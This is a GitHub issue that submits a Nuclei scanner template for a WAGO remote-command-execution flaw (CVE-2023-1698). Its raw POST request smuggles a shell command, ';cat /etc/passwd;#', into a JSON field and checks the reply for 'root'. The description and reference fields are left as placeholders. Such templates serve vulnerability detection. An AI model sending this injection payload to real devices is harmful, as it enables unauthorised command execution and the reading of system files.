### ISSUE TITLE
[nuclei-template] 

### ISSUE THREAD

**Issue by Axianke** [projectdiscovery/nuclei-templates#7275]
### Nuclei Template:

```yaml
id: CVE-2023-1698_wago_rce

info:
  name: wago_rce
  author: xianke
  severity: high
  description: description
  reference:
    - https://
  tags: wago,rce

requests:
  - raw:
      - |-
        POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: curl/7.64.1
        Accept: */*
        Content-Length: 32
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        {"package":";cat /etc/passwd;#"}


    matchers:
      - type: regex
        part: body
        regex:
          - "root"
```
